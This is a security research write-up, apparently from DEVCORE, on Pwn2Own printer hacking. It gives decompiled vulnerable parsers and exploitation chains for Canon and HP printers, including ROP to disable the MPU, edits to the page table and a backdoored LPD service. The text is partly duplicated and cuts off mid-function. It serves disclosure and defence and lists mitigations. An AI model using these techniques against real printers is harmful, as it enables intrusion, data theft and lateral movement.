Generally, we can modify the translation table entry through ROP if we have stack overflow under high privileges. But when we tried to write directly to the translation table, the HP printer crashed.

We checked and found that the leading cause of the memory fault exception is that Memory Protection Unit(MPU) protects the translation table.

MPU in HP M283fdw

The MPU lets you partition memory into regions and set individual protection attributes for each region. It is an entirely different mechanism from the MMU and is often found in IoT devices. HP enables the MPU at boot and defines permissions for each region, so we cannot manipulate the page table.

After a long time of reverse engineering and referencing the ARM Manual, we found that the MPU can be turned off by clearing MPU_CTRL. We found that the location is 0xE0400304, slightly different from ARM’s spec.

Exploitation

After understanding HP’s MMU and MPU mechanism, we can easily use ROP to turn off the MPU and successfully modify the translation table entry. We can arbitrarily modify the code of any service, and we finally chose Line Printer Daemon(LPD). We modified it into a backdoor, read more payloads to the specified location, and finally executed the shellcode.

One thing must be mentioned, though. After overwriting the translation table entry and the LPD code, be sure to flush the TLB and invalidate the I-cache and D-cache. Otherwise the CPU is very likely to keep executing the stale code, causing the exploit to fail.

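Flush TLB

flush_tlb:
    mov r12, #0
    mcr p15, 0, r12, c8, c7, 0      @ invalidate the entire unified TLB

Invalidate I-cache

disable_icache:
    mrc p15, 0, r1, c1, c0, 0       @ read the CP15 control register
    bic r1, r1, #(1 << 12)          @ clear the I bit (bit 12, I-cache enable)
    mcr p15, 0, r1, c1, c0, 0       @ write the control register back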

Exploitation Step

  • Trigger stack overflow in LLMNR and overwrite return address
  • Use limited ROP to
    • disable MPU
    • modify translation table entry and get read-write execute permission
    • flush TLB
    • modify the code of LPD
    • invalidate I-cache and D-cache
  • Use modified LPD to read our shellcode and jump to shellcode

Pwn2Own Austin 2021

By the time we could execute shellcode, we had only one week left. In the end we chose the same approach as with Canon: modifying a string to display Pwned by DEVCORE on the LCD.

After that, we also tried turning the backdoor into a debug console to make many functions easier to use, such as viewing memory information and playing music.

F-Secure Labs used the music-playing function for their demonstration at the contest, which was fascinating. You can go here to see how it went at Pwn2Own.

Result

In Pwn2Own Austin 2021, we got 2nd place after pwning other devices and printers. We had a good experience and learned some new things.

Mitigation

Update

The first is to update regularly. All the printers mentioned have been patched. Updating is often ignored: we frequently find printers in corporate intranets that have gone several years without an update, or that still use the default password.

Disable unused service

Another mitigation is to turn off services that are not in use wherever possible. Most printers enable too many services by default, and many of them are never used. We even think you can turn off the discovery services and enable only the services you actually use.

Firewall

It would be better if you could apply a firewall. Most printers provide related functions.

Summary

With code execution on a printer, besides displaying things on the LCD, we can use the printer to steal confidential information, whether confidential documents or credentials. We can also use the printer for lateral movement, and because it is hard to detect, it is an excellent target for the red team.

By the way, the protocols of the discovery service series on many printers are often vulnerable. If you want to find vulnerabilities in printers or other IoT devices, you can look in this direction.

To Be Continued

We also found several vulnerabilities in the printer series at Pwn2Own Toronto 2022 last year. We will be releasing detailed information soon, so stay tuned for Part II.

Reference

Your printer is not your printer ! - Hacking Printers at Pwn2Own Part I


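In recent years, printers have become one of the indispensable devices in corporate intranets, and their features have multiplied as technology has advanced. Beyond ordinary printing and faxing, they now support cloud printing services such as AirPrint, which make printing more convenient: you can print directly from a mobile device. Printers have also become an essential part of the IoT. Because they are so convenient, they are often used to print sensitive internal documents, which makes printer security in the enterprise all the more important.

The year before last, we found Pre-auth RCE vulnerabilities in Canon and HP printers (CVE-2022-24673, CVE-2022-3942) and a vulnerability in Lexmark (CVE-2021-44734). At Pwn2Own Austin 2021 we took control of the Canon ImageCLASS MF644Cdw, the HP Color LaserJet Pro MFP M283fdw, and the Lexmark MC3224i, earning Master of Pwn points. This article covers the details of the Canon and HP vulnerabilities and how we exploited them.

This research was also presented at HITCON 2022 and CODE BLUE 2022. You can get the slides here!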

Printer

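In the early days, using a printer usually meant connecting it to a computer with an IEEE 1284 or USB printer cable and installing the driver supplied by the vendor. Today's printers can connect to the network and offer all sorts of additional features. Usually, once a printer is plugged into the LAN, computers on that LAN can easily discover the newly installed printer.

Printers on the market today enable a great many services by default, all to make printing more convenient, such as FTP, AirPrint, and Bonjour.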

Motivation

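Why research printers?

Red Team Intranet Needs

In our past red team engagements, printers appeared in nearly every modern corporate intranet, usually more than one, yet they tend to be overlooked and are often left without updates. A printer is also a very good hiding place for an attacker, because it is usually hard to detect. It is worth mentioning that larger enterprises may well join printers to AD, turning them into an entry point for obtaining confidential information.

Pwn2Own Austin 2021

Another reason is that in 2021 printers became one of the main targets promoted by Pwn2Own Mobile for the first time. We were preparing to take on the Pwn2Own stage again, so we decided to take a look.

At first we thought it would be very simple: as with most IoT devices, we expected to find command injection issues easily. We did not realize that many printers run an RTOS rather than ordinary Linux, but that only strengthened our determination to take them on.

This article focuses on the more interesting Canon and HP parts; we may discuss Lexmark another time.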

Analysis

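When we started, much of the material we consulted required tearing down the hardware to obtain a debug console and then dumping memory to get the original firmware. In the end we took a different approach and did not tear down a single printer.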

Canon

Firmware Extract

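The version we analyzed initially was v6.03. We first tried to parse it with binwalk, but the firmware is obfuscated and we could not unpack it directly.

Figure: Obfuscated Canon ImageCLASS MF644Cdw firmware

We also tried the approaches from TREASURE CHEST PARTY QUEST: FROM DOOM TO EXPLOIT by Synacktiv and Hacking Canon Pixma Printers – Doomed Encryption by Contextis Research, but this is a completely different series, and we could not use the same methods to deobfuscate the firmware.

So we began analyzing the format and contents of the obfuscated firmware.

Broadly, every obfuscated firmware image begins with the magic NCFW and carries the size of the firmware; the rest is obfuscated data.

We then guessed that older firmware for this printer might not be obfuscated, with obfuscation introduced at some later version. If we could get hold of an intermediate version, we might be able to recover the deobfuscation method. The magic also lets us tell whether an image is obfuscated.

The following firmware download URL was obtained from the official website or by capturing packets: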

https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDQwMDAwNDc1MjA1&cmp=Z01&lang=EN

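After analysis, the URL can be split into several parts.

From this we can roughly work out the pattern of the download URLs and use it to download every firmware version. The versions we downloaded at the time were: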

  • V2.01
  • V4.02
  • V6.03
  • V9.03
  • V10.02

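v10.02 was a version that would not be released until several weeks later, but it could already be downloaded this way. After downloading every version, we found that all firmware in this series is obfuscated, so earlier versions could not give us the deobfuscation method. We could, however, download firmware for other Canon printer series and look for a similar obfuscation algorithm. The downloads came to about 130 GB. By grepping for NCFW and servicemode.html, we could find firmware that was not obfuscated.

In the end we found four firmware images that met the criteria. We chose the WG7000 series for analysis and found what appeared to be the deobfuscation function.

Fortunately, by reimplementing this function we could recover the plaintext MF644Cdw firmware.

After recovering the firmware, we had to find its image base address so that IDA could resolve references correctly. The common analysis tool rbasefind can be used to find the image base.

The base we found at first was 0x40b0000, but after loading the firmware into IDA, the debug-message strings of most functions did not match up.

As shown in the figure above, loc_4489AC08 should point to a function-name string, but the address was treated as code and its contents were not a string, which means the address is slightly offset from the real location. Ordinary function analysis was largely unaffected. To correct this, pick a function whose name is known, find the string holding its name, compute the offset between the two, and adjust the image base accordingly. The image base we ended up with is 0x40affde0. After the adjustment, the functions resolve to their correct names.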

Now the firmware can be analyzed normally. Initial analysis shows that the Canon ImageCLASS MF644Cdw has the following architecture:

  • OS - DryOSV2
    • Customized RTOS by Canon
  • ARMv7 32bit little-endian
  • Linked with application code into single image
    • Kernel
    • Service

HP

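HP's firmware was much easier to obtain. We could extract the correct firmware with binwalk -Z, which took roughly 3 to 4 days. The remaining steps, such as finding the image base address, were the same as for Canon, so we will not repeat them here. Initial analysis shows that the HP Color LaserJet Pro MFP M283fdw has the following architecture: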

  • OS
    • RTOS - Modify from ThreadX/Green Hills
  • ARM11 Mixed-endian
    • Code - little-endian
    • Data - Big-endian

Attack Surface

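Most multifunction printers on the market today enable a large number of services by default:

Service   Port         Description
RUI       TCP 80/443   Web interface
PDL       TCP 9100     Page Description Language
PJL       TCP 9100     Printer Job Language
IPP       TCP 631      Internet Printing Protocol
LPD       TCP 515      Line Printer Daemon Protocol
SNMP      UDP 161      Simple Network Management Protocol
SLP       TCP 427      Service Location Protocol
mDNS      UDP 5353     Multicast DNS
LLMNR     UDP 5355     Link-Local Multicast Name Resolution

Generally, RUI (the web interface) is enabled for ease of management. Port 9100 is also commonly used by printers, mainly for transferring print data. The rest varies by vendor, but the services listed above are usually present and mostly enabled by default. After evaluating these services, we decided to focus on service discovery and the DNS family of protocols, because in our long experience vendors tend to write their own implementations of these services rather than use long-established open source ones, and implementing these protocols is very error-prone in practice. The services we mainly analyzed were SLP, mDNS, and LLMNR.

Next, we use Pwn2Own Austin 2021 as a case study to look at the problems these protocols commonly have.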

Hacking printers at Pwn2Own

Canon

Service Location Protocol

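SLP is a service discovery protocol, mainly used to let computers find printers quickly. SLP has also been a frequent source of problems in ESXi. Canon's SLP service is implemented by Canon itself; details of SLP can be found in RFC2608. Before analyzing SLP, we need to understand the general structure of an SLP packet.

Figure: SLP Packet Structure

We only need to look at function-id here. This field determines the request type and the format of the payload. Canon implements only two types: Service Request and Attribute Request.

An Attribute Request (AttrRqst) lets the user obtain an attribute list based on a service and a scope. The scope defines the range to search, for example Canon printers.

Example:

The structure of an Attribute Request is roughly as follows:

It is mainly a combination of lengths and values. Parsing this kind of format is error-prone and needs particular care, and in fact Canon got it wrong when parsing this structure.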

Vulnerability

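When Canon parses the scope list, it converts escape sequences to ASCII characters; for example, \41 becomes A. What could go wrong with such a simple conversion? Let's look at the pseudocode:

int parse_scope_list(...){
    char destbuf[36];
    unsigned int max = 34;
    parse_escape_char(..., destbuf, max);
}

As the code above shows, parse_scope_list allocates a 36-byte destbuf and passes a maximum size of 34 to parse_escape_char. Nothing is wrong so far. Now let's look at parse_escape_char: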

int __fastcall parse_escape_char(unsigned __int8 **pdata, _WORD *pdatalen, unsigned __int8 *destbuf, _WORD *max)
{
  unsigned int idx; // r7
  int v7; // r9
  int v8; // r8
  int error; // r11
  unsigned __int8 *v10; // r5
  unsigned int i; // r6
  int v12; // r1
  int v13; // r0
  unsigned int v14; // r1
  bool v15; // cc
  int v16; // r2
  bool v17; // cc
  unsigned __int8 v18; // r0
  int v19; // r0
  unsigned __int8 v20; // r0
  unsigned int v21; // r0
  unsigned int v22; // r0

  idx = 0;
  v7 = 0;
  v8 = 0;
  error = 0;
  v10 = *pdata;
  for ( i = (unsigned __int16)*pdatalen; i && !v7; i = (unsigned __int16)(i - 1) )
  {
    v12 = *v10;
    if ( v12 == ',' )
    {
      if ( i < 2 )
        return -4;
      v7 = 1;
    }
    else
    {
      if ( v12 == '\\' ) //----------------------[1]
      {
        if ( i < 3 )
          return -4;
        v13 = v10[1];
        v14 = v13 - '0';
        v15 = v13 - (unsigned int)'0' > 9;
        if ( v13 - (unsigned int)'0' > 9 )
          v15 = v13 - (unsigned int)'A' > 5;
        if ( v15 && v13 - (unsigned int)'a' > 5 )
          return -4;
        v16 = v10[2];
        v17 = v16 - (unsigned int)'0' > 9;
        if ( v16 - (unsigned int)'0' > 9 )
          v17 = v16 - (unsigned int)'A' > 5;
        if ( v17 && v16 - (unsigned int)'a' > 5 )
          return -4;
        if ( v14 <= 9 )
          v18 = 0x10 * v14;
        else
          v18 = v13 - 0x37;
        if ( v14 > 9 )
          v18 *= 0x10;
        *destbuf = v18; //-------------------[2]
        v19 = v10[2];
        v10 += 2;
        v20 = (unsigned int)(v19 - 0x30) > 9 ? (v19 - 55) & 0xF | *destbuf : *destbuf | (v19 - 0x30) & 0xF;
        *destbuf = v20;
        LOWORD(i) = i - 2;
        if ( !strchr((int)"(),\\!<=>~;*+", *destbuf) )
        {
          v21 = *destbuf;
          if ( v21 > 0x1F && v21 != 0x7F )
            return -4;
        }
        goto LABEL_40;
      }
      if ( strchr((int)"(),\\!<=>~;*+", v12) ) //-----------------------[3]
        return -4;
      v22 = *v10;
      if ( v22 <= 0x1F || v22 == 0x7F )
        return -4;
      if ( v22 != ' ' )
      {
        v8 = 0;
        goto LABEL_35;
      }
      if ( !v8 )
      {
        v8 = 1;
LABEL_35:
        if ( (unsigned __int16)*max <= idx ) //----------------------[4]
        {
          error = 1;
          goto next_one;
        }
        if ( v8 )
          LOBYTE(v22) = 32;
        *destbuf = v22;
LABEL_40:
        ++destbuf;
        idx = (unsigned __int16)(idx + 1);
      }
    }
next_one:
    ++v10;
  }
  if ( error )
  {
    *max = 0;
    debugprintff(3645, 4, "Scope longer than buffer provided");
LABEL_48:
    *pdata = v10;
    *pdatalen = i;
    return 0;
  }
  if ( idx )
  {
    *max = idx;
    goto LABEL_48;
  }
  return -4;
}

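At [3], which handles characters that are not escaped, the code checks at [4] whether the maximum length has been exceeded. In the escape-sequence path at [1], however, there is no length check at all, and the converted result is written directly to the destination buffer at [2]. If the supplied string consists mostly of escape sequences, the result is a stack overflow.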
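The missing check can be illustrated with a small sketch of an escape decoder that applies the same bound to escaped and unescaped characters alike. This is our own simplified illustration, not Canon's code or patch: the name unescape_checked is hypothetical, and it omits the reserved-character and whitespace handling of the original.

```c
#include <assert.h>
#include <stddef.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_val(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode "\XX" escapes from src into dst. Returns the number of bytes
 * written, or -1 if the input is malformed or dst is too small. */
int unescape_checked(const char *src, size_t src_len, char *dst, size_t dst_size)
{
    size_t in = 0, out = 0;

    assert(src != NULL && dst != NULL);
    while (in < src_len) {
        char c = src[in];

        /* One bound check covering BOTH the escaped and the plain path. */
        if (out >= dst_size)
            return -1;

        if (c == '\\') {
            int hi, lo;
            if (src_len - in < 3)
                return -1;                 /* truncated escape */
            hi = hex_val(src[in + 1]);
            lo = hex_val(src[in + 2]);
            if (hi < 0 || lo < 0)
                return -1;                 /* not two hex digits */
            c = (char)((hi << 4) | lo);
            in += 3;
        } else {
            in += 1;
        }
        dst[out++] = c;
    }
    return (int)out;
}
```

Placing the check before the branch means no path can write to dst without passing it, which is exactly the property the decompiled function lacks at [2].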

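After finding a vulnerability, the first thing to do is check what protections are in place, to prepare for exploitation. Our analysis showed that the Canon printer has no memory protections at all.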

Protection

  • No Stack Guard
  • No DEP
  • No ASLR

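No Stack Guard, no DEP, and no ASLR: it is about as hack-friendly as it gets! It feels like going back to the 90s, when a single stack overflow could take you all the way. From here, exploitation follows the classic binary exploitation recipe: find a place to put shellcode, overwrite the return address, and jump to the shellcode to get arbitrary code execution. In the end we chose the BJNP service to hold our shellcode.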

BJNP

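BJNP is also a service discovery protocol, designed by Canon itself. It has had many vulnerabilities in the past, and Synacktiv once exploited a vulnerability in this protocol to take control of a printer. We will not go into detail here; more can be found in this article. We used a similar technique. BJNP stores controllable session data in a known global buffer, and we can use this feature to place our shellcode at a fixed location, with essentially no restrictions.

To recap the exploitation steps:

Exploitation Step

  • Use BJNP to place our shellcode at a fixed, known location.
  • Trigger the stack overflow in SLP and overwrite the return address.
  • Jump to our shellcode and execute it.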

Pwn2Own Austin 2021

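At Pwn2Own you usually need to prove that you have compromised the printer, and you are free to choose how to show it. Our original plan was to do what we did when exploiting the Lexmark printer and put our logo directly on the printer's LCD screen.

Before the contest, however, we spent a lot of time working out how to draw the logo on the screen, possibly more than we spent finding the bug and writing the exploit. In the end, because of time constraints, we took the safer approach of modifying the Service Mode string and displaying that on the screen.

Displaying an image on the screen is not actually difficult, though. Other teams found a way, and interested readers can give it a try.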

Debug

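At this point some readers may wonder how to debug in such an environment. In practice there are a few common methods:

  • Attach to the hardware to obtain a debug console and use its built-in features to debug
  • Use an old vulnerability to gain code execution and install a custom debugger

However, we had already updated to the latest version by then. That version has no known vulnerabilities, so we would have had to downgrade, and tearing down the hardware would also have taken additional time. Since we already had a vulnerability, neither option was worth the cost. In the end we used the most traditional method: sleep debugging.

After ROP or shellcode execution, we print the result to a web page or another visible place and then call sleep, so the result can be read from the web page or elsewhere. Finally we reboot and repeat the whole process. That said, attaching a debug console really is the more convenient approach.

Next, let's talk about HP printers.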

HP

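LLMNR is a protocol very similar to mDNS. It provides name resolution on the local network but is simpler than mDNS, and it is usually paired with some service discovery protocol. Here is a brief introduction to the mechanism:

For name resolution on the local network, Client A first uses multicast to look for Client C on the LAN.

When Client C receives the query, it replies to Client A, completing the local name resolution.

LLMNR is largely built on the DNS packet format, which looks like this:

It consists mainly of a header followed by Queries; Count indicates the number of queries of each type.

Each DNS Query is made up of labels, and each label, as in the figure above, is a length followed by a string. There is also a Message Compression mechanism. Handling these has historically been very error-prone; THE COST OF COMPLEXITY: Different Vulnerabilities While Implementing the Same RFC at BlackHat 2021 describes similar problems.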

Vulnerability

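Let's go back and look at HP's implementation:

int llmnr_process_query(...){
    char result[292];
    consume_labels(llmnr_packet->qname,result,...);
    ...
}

Here we can see that when HP processes an LLMNR packet, it passes in a fixed-size buffer to hold the processed result, and consume_labels is the function that handles the DNS labels.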

int __fastcall consume_labels(char *src, char *dst, llmnr_hdr *a3)
{
  int v3; // r5
  int v4; // r12
  unsigned int len; // r3
  int v6; // r4
  char v7; // r6
  bool v8; // cc
  int v9; // r0
  unsigned __int8 chr; // r6
  int result; // r0

  v3 = 0;
  v4 = 0;
  len = 0;
  v6 = 0;
  while ( 1 )
  {
    chr = src[v3]; //-------------[1]
    if ( !chr )
      break;
    if ( (int)len <= 0 )
    {
      v8 = chr <= 0xC0u;
      if ( chr == 0xC0 )
      {
        v9 = src[v3 + 1];
        v6 = 1;
        v3 = 0;
        src = (char *)a3 + v9;
      }
      else
      {
        len = src[v3++];
        v8 = v4 <= 0;
      }
      if ( !v8 )
        dst[v4++] = '.';
    }
    else
    {
      v7 = src[v3++];
      len = (char)(len - 1);
      dst[v4++] = v7; //----------[2]
    }
  }
  result = v3 + 1;
  dst[v4] = 0;
  if ( v6 )
    return 2;
  return result;
}

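At [1] in consume_labels, the function first reads the label length and then handles it according to its type. [2] handles the ordinary case: there is no length check here, and the label is written directly into the dst buffer, which leads to a stack overflow. At this point we thought we were nearly done and that exploitation would work much as it did for Canon. However, while writing the exploit we found that HP has some protection mechanisms that Canon lacks.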

Protection

  • No Stack Guard
  • XN(DEP)
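  • Memory Protection Unit (MPU)
  • No ASLR

HP printers add the XN and MPU memory protections, and this vulnerability also comes with more restrictions. We can overflow only about 0x100 bytes, and the payload cannot contain null bytes. This severely limits our ROP, so we could not carry out the follow-up actions with ROP alone and needed to find another vulnerability or another method. After a while, we started asking how HP printers implement XN (DEP) and the MPU. Let's review the HP RTOS:

  • All service code and kernel code live in the same binary.
  • Most tasks run in the same memory space (no process isolation), and almost all run in a high-privilege mode.

Given these two points, could we bypass the protections by understanding the MMU and MPU in the HP RTOS?

Let's look at the MMU mechanism in the HP RTOS.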

MMU in HP M283fdw

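The HP M283fdw uses a single-level translation table for address translation. Each translation table entry represents a 1MB section, and the translation table sits at the fixed address 0x4003c000.

Each translation table entry maps to a physical address and holds the permissions for that section. The CPU uses this to decide execute permission and write permission. If we can modify a translation table entry, we can change memory permissions and also map any physical address. The permission-related fields are AP, APX, and XN.

From the vulnerability above, note that with a stack overflow in code running at high privilege, we can modify translation table entries through ROP. But when we tried writing directly to the translation table, the result was as follows:

The printer crashed. We looked into it and found a memory fault exception, caused mainly by the Memory Protection Unit (MPU) protecting that memory region.

So let's look at how the MPU works.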

MPU in HP M283fdw

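The main function of the MPU is to split memory into regions and define the permissions of each region. It is a completely different mechanism from the MMU and is very common in IoT devices. HP enables it at boot and defines permissions for every region, so we cannot manipulate the page table ourselves.

After a long period of reverse engineering and consulting the ARM Manual, we found that clearing MPU_CTRL is enough to turn off the MPU. Reverse engineering showed that MPU_CTRL on the HP M283fdw is located at 0xE0400304, which differs slightly from ARM's spec; we are not sure why.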

Exploitation

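With an understanding of HP's MMU and MPU mechanisms, we could easily use ROP to turn off the MPU and successfully modify the translation table entry. We could then modify the code of any service at will. We chose the Line Printer Daemon (LPD) service and turned it into a backdoor that reads more payload into a specified location and finally executes the shellcode we send.

One point needs special attention: after overwriting the translation table entry and the LPD code, be sure to flush the TLB and clear the I-cache and D-cache. Otherwise the CPU may well keep running the old code, and the exploit will fail.

Flush TLB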

flush_tlb:
    mov r12, #0
    mcr p15, 0, r12, c8, c7, 0

Invalidate I-cache

disable_icache:
    mrc p15, 0, r1, c1, c0, 0
    bic r1, r1, #(1 << 12)
    mcr p15, 0, r1, c1, c0, 0

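To recap the exploitation steps:

Exploitation Step

  • Trigger the stack overflow in LLMNR
  • Use the limited ROP to disable the MPU
  • Use ROP to modify the translation table entry and gain read-write-execute permission
  • Flush the TLB
  • Modify the code of the LPD service
  • Clear the I-cache and D-cache
  • Use the modified LPD to read our shellcode and execute it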

Pwn2Own Austin 2021

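By the time we could execute shellcode, we had only one week left. In the end we chose the same approach as with Canon: modifying a string to display Pwned by DEVCORE on the LCD.

Fortunately, it worked on our first attempt :)

Afterwards we also tried turning the backdoor into a debug console to make many features easier to use, such as viewing memory information and playing music. F-Secure Labs used the music-playing feature for their demonstration during the contest, which was great fun. You can see how it went here.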

Result

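At Pwn2Own Austin 2021, after compromising other devices and printers, we finished in second place. We gained good experience and learned some new things.

So what can ordinary users do to keep their printers from becoming an attack target or even a stepping stone?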

Mitigation

Update

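First, update regularly. All the printers above have been patched. This is very often overlooked: we frequently see printers that have gone years without an update, or that still use the default password, which makes them easy targets.

Disable unused service

Next, turn off unused services wherever possible. Most printers enable far too many services by default that are never used. We even think the discovery services can be turned off; enable only what you actually use.

Firewall

Better still, add a firewall. Most printers provide this functionality.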

Summary

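In fact, once we have shellcode execution, beyond displaying things on the LCD we can use the printer to steal confidential information, whether confidential documents or credentials. A printer is also a point for lateral movement, and because it is hard to detect, it is an excellent target for red teams. In addition, the discovery-service and DNS-family protocols on many printers are frequent sources of bugs. If you want to find vulnerabilities in printers or other IoT devices, this may be a good direction to look first.

To Be Continued

Finally, at Pwn2Own Toronto 2022 last year we also found several vulnerabilities in printers. We will publish the details soon, so stay tuned for Part II.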

Reference

Your printer is not your printer ! - Hacking Printers at Pwn2Own Part II


Hacking Printers at Pwn2Own Toronto 2022

Based on our previous research, we also discovered Pre-auth RCE vulnerabilities (CVE-2023-0853, CVE-2023-0854) in other models of Canon printers. For the HP vulnerability, we had a collision with another team. In this section, we detail the Canon and HP vulnerabilities we exploited during Pwn2Own Toronto.

  • Pwn2Own Toronto 2022 Target

Target                           Price    Master of Pwn Points
HP Color LaserJet Pro M479fdw    $20000   2
Lexmark MC3224i                  $20000   2
Canon imageCLASS MF743Cdw        $20000   2

Analysis

Canon

Firmware Extract

Same as 2021, you can refer to Part I. The current version is v11.04.

HP

The firmware can be obtained from HP’s official website. However, unlike in 2021, it cannot be directly extracted using binwalk. The firmware is encrypted with AES, and it’s hard to decrypt directly from the information.

At first, our thought was to look for the firmware of the same series to see if there was an unencrypted version. However, there was no such firmware on HP’s official website that met our criteria. We initially considered tearing down the printer to dump the firmware, but during our search on Google, we stumbled upon an older mirror site. This site enabled directory listing, allowing us to access all the firmware stored on that mirror website.

However, the mirror site only mirrored content up to 2016 and did not have the latest firmware. Still, we later managed to work out the official directory structure from the information on that site, which helped us obtain an unencrypted firmware image from a similar series.

After our analysis, we found decryption-related information in the Firmware from fwupd. By reverse engineering, we were able to identify the encryption method and the Key. We can use the key to decrypt the target version of the Firmware.

HP Color LaserJet Pro M479fdw

  • OS - Linux Base
  • ARMv7 32bit little-endian

Vulnerability & Exploitation

Canon

mDNS (CVE-2023-0853)

We found a stack overflow in the mDNS service. The mDNS protocol resolves hostnames to IP addresses within small networks that do not include a local name server, and it is commonly used by Apple and IoT devices.

It is enabled on Canon ImageCLASS MF743Cdw(Version 11.04) by default.

Before we look at the detail of the vulnerability we need to talk about mDNS Packet Structure.

mDNS is based on the DNS packet format defined in RFC1035 Section 4 for both queries and responses. mDNS queries and responses utilize the DNS header format defined in RFC1035 with exceptions noted below:

The packet format:

    +---------------------+
    |        Header       |
    +---------------------+
    |       Question      | the question for the name server
    +---------------------+
    |        Answer       | RRs answering the question
    +---------------------+
    |      Authority      | RRs pointing toward an authority
    +---------------------+
    |      Additional     | RRs holding additional information
    +---------------------+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

The header contains the following fields:

                                    1  1  1  1  1  1
      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      ID                       |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    QDCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ANCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    NSCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ARCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)
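
As a small illustration of the header layout above, the following sketch reads the six 16-bit big-endian fields from the first 12 bytes of a packet. The struct and function names are ours for illustration and are not taken from the Canon firmware.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The six 16-bit fields of the RFC 1035 header, in host byte order. */
struct dns_header {
    uint16_t id;
    uint16_t flags;     /* QR, Opcode, AA, TC, RD, RA, Z, RCODE */
    uint16_t qdcount;
    uint16_t ancount;
    uint16_t nscount;
    uint16_t arcount;
};

/* Read a big-endian (network order) 16-bit value. */
static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Parse the fixed 12-byte header. Returns 0 on success, or -1 if the
 * packet is too short to contain a header. */
int dns_parse_header(const unsigned char *pkt, size_t len, struct dns_header *h)
{
    assert(pkt != NULL && h != NULL);
    if (len < 12)
        return -1;
    h->id      = rd16(pkt + 0);
    h->flags   = rd16(pkt + 2);
    h->qdcount = rd16(pkt + 4);
    h->ancount = rd16(pkt + 6);
    h->nscount = rd16(pkt + 8);
    h->arcount = rd16(pkt + 10);
    return 0;
}
```

ANCOUNT is the field that tells a parser how many answer records follow, so it directly controls how many times an answer-parsing loop runs.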

The answer section contains RRs that answer the question.

Resource record format:

                                    1  1  1  1  1  1
      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                                               |
    /                                               /
    /                      NAME                     /
    |                                               |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      TYPE                     |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                     CLASS                     |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      TTL                      |
    |                                               |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                   RDLENGTH                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
    /                     RDATA                     /
    /                                               /
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

The RDATA section varies depending on the ‘type’. When type=NSEC, its format is as follows:

   The RDATA of the NSEC RR is as shown below:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   /                      Next Domain Name                         /
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   /                       Type Bit Maps                           /
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://www.ietf.org/rfc/rfc4034.txt)

The other elements are not important for this vulnerability, so we will not explain them here. More details can be found in RFC6762, RFC1035, and RFC4034.

Where is the bug

When the Canon ImageCLASS MF743Cdw parses an Answer record of type NSEC in an mDNS packet, there is a stack overflow.

In the function bnMdnsParseAnswers, it will parse answer section.

int __fastcall bnMdnsParseAnswers(netbios_header *mdns_packet, unsigned int *ppayloadlen, netbios_header *pmdns_header, _WORD *anwser_rr, rrlist **payload, _DWORD *pinfo)
{
  ...
  char nsec_buf[256]; // ------ fixed size on the stack
  ...
  _mdns_packet = (int)mdns_packet;
  p_payloadlen = ppayloadlen;
  p_mdns_header = pmdns_header;
  anwser_cnt = anwser_rr;
  v66 = 0;
  cur_ptr = &mdns_packet->payload[*pinfo];
  v9 = *payload;
  v10 = *payload;
  do
  {
    v11 = v10 == 0;
    if ( v10 )
    {
      v9 = v10;
      v10 = (rrlist *)v10->c;
    }
    else
    {
      v6 = aBnmdnsparseans;
      v10 = 0;
      v67 = 0;
    }
  }
  while ( !v11 );
  while ( (unsigned __int16)*anwser_cnt > v67 )
  {
    ...
    if ...
    type = (unsigned __int16)pname->type;
    if ( type == 28 )
      goto LABEL_36;
    if ...
    if ...
    if ( type != 0x21 )
    {
      if ( type != 47 ) // NSEC
      {
        ...
        goto LABEL_95;
      }
      v62 = 0;
      v63 = 0;
      zeromemory(nsec_buf, 256, v19, v20);
      v47 = bnMdnsMalloc(8);
      rrlist->pname->nsec = v47;
      if ( !v47 )
      {
        bnMdnsFreeRRLIST((int)rrlist);
        v50 = 2720;
LABEL_76:
        debugprintff(3610, 3, "[bnjr] [%s] <%s:%d> bnMdnsParseAnswers error in malloc(NSEC)\n", "IMP/mdns/common/tcBnMdnsMsg.c", v6, v50);
        return 3;
      }
      maybe_realloc(v47, 8);
      nsec = rrlist->pname->nsec;
      nsec_len = bnMdnsGetDecodedRRNameLen(cur_ptr, *ppayloadlen, (char *)_mdns_packet, &dwbyte);
      if ...
      if ...
      v51 = (_BYTE *)bnMdnsMalloc(nsec_len);
